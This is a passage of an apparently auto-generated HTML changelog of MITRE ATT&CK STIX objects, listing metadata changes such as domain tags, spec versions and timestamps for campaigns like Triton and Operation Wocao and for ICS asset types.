black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-20 16:26:04.859000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.732000+00:00</td></tr></tbody></table></details></details><h2>Campaigns</h2><h3>enterprise-attack</h3><details><summary>Patches</summary><hr><h4>[C0063] 2025 Poland Wiper Attacks</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_domains</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>['enterprise-attack', 'ics-attack']</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 23:21:30.984000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.730000+00:00</td></tr></tbody></table></details><hr><h4>[C0051] APT28 Nearest Neighbor Campaign</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_domains</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>['enterprise-attack', 'mobile-attack']</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-03-10 19:48:56.912000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.730000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[C0060] Operation AkaiRyū</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_domains</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>['enterprise-attack']</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 02:25:15.505000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.730000+00:00</td></tr></tbody></table></details><hr><h4>[C0005] Operation Spalax</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_domains</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>['enterprise-attack']</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-04-11 00:29:32.199000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.730000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[C0014] Operation Wocao</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_domains</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>['enterprise-attack']</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 03:04:25.546000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.730000+00:00</td></tr></tbody></table></details><hr><h4>[C0056] RedPenguin</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_domains</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>['enterprise-attack']</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 03:46:34.675000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.729000+00:00</td></tr></tbody></table></details><hr><h4>[C0030] Triton Safety Instrumented System Attack</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_domains</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>['ics-attack', 'enterprise-attack']</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:24:57.457000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.729000+00:00</td></tr></tbody></table></details><hr><h4>[C0037] Water Curupira Pikabot Distribution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_domains</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>['enterprise-attack']</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 18:11:30.378000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.730000+00:00</td></tr></tbody></table></details></details><h3>ics-attack</h3><details><summary>Patches</summary><hr><h4>[C0063] 2025 Poland Wiper Attacks</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_domains</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>['enterprise-attack', 'ics-attack']</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 23:21:30.984000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.730000+00:00</td></tr></tbody></table></details><hr><h4>[C0030] Triton Safety Instrumented System Attack</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_domains</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>['ics-attack', 'enterprise-attack']</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:24:57.457000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.729000+00:00</td></tr></tbody></table></details></details><h2>Assets</h2><h3>ics-attack</h3><details><summary>Patches</summary><hr><h4>[A0008] Application Server</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28T14:58:00.982Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28 14:58:00.982000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23T01:01:24.568Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.768000+00:00</td></tr></tbody></table></details><hr><h4>[A0007] Control Server</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28T14:55:39.339Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28 14:55:39.339000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23T01:04:14.767Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.768000+00:00</td></tr></tbody></table></details><hr><h4>[A0009] Data Gateway</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28T15:01:48.509Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28 15:01:48.509000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-27T17:47:40.077Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.768000+00:00</td></tr></tbody></table></details><hr><h4>[A0006] Data Historian</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28T14:48:36.305Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28 14:48:36.305000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23T01:03:57.506Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.768000+00:00</td></tr></tbody></table></details><hr><h4>[A0017] Distributed Control System (DCS) Controller</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-09-24T22:53:09.627Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-09-24 22:53:09.627000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23T01:01:01.668Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.768000+00:00</td></tr></tbody></table></details><hr><h4>[A0013] Field I/O</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28T17:57:22.946Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28 17:57:22.946000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-27T16:50:21.228Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.768000+00:00</td></tr></tbody></table></details><hr><h4>[A0016] Firewall</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_related_assets</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>['General']</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-09-24T18:17:26.575Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-09-24 18:17:26.575000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-27T18:02:22.344Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 14:53:28.476000+00:00</td></tr></tbody></table></details><hr><h4>[A0002] Human-Machine Interface (HMI)</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28T14:38:54.407Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28 14:38:54.407000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23T00:58:37.171Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.768000+00:00</td></tr></tbody></table></details><hr><h4>[A0005] Intelligent Electronic Device (IED)</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 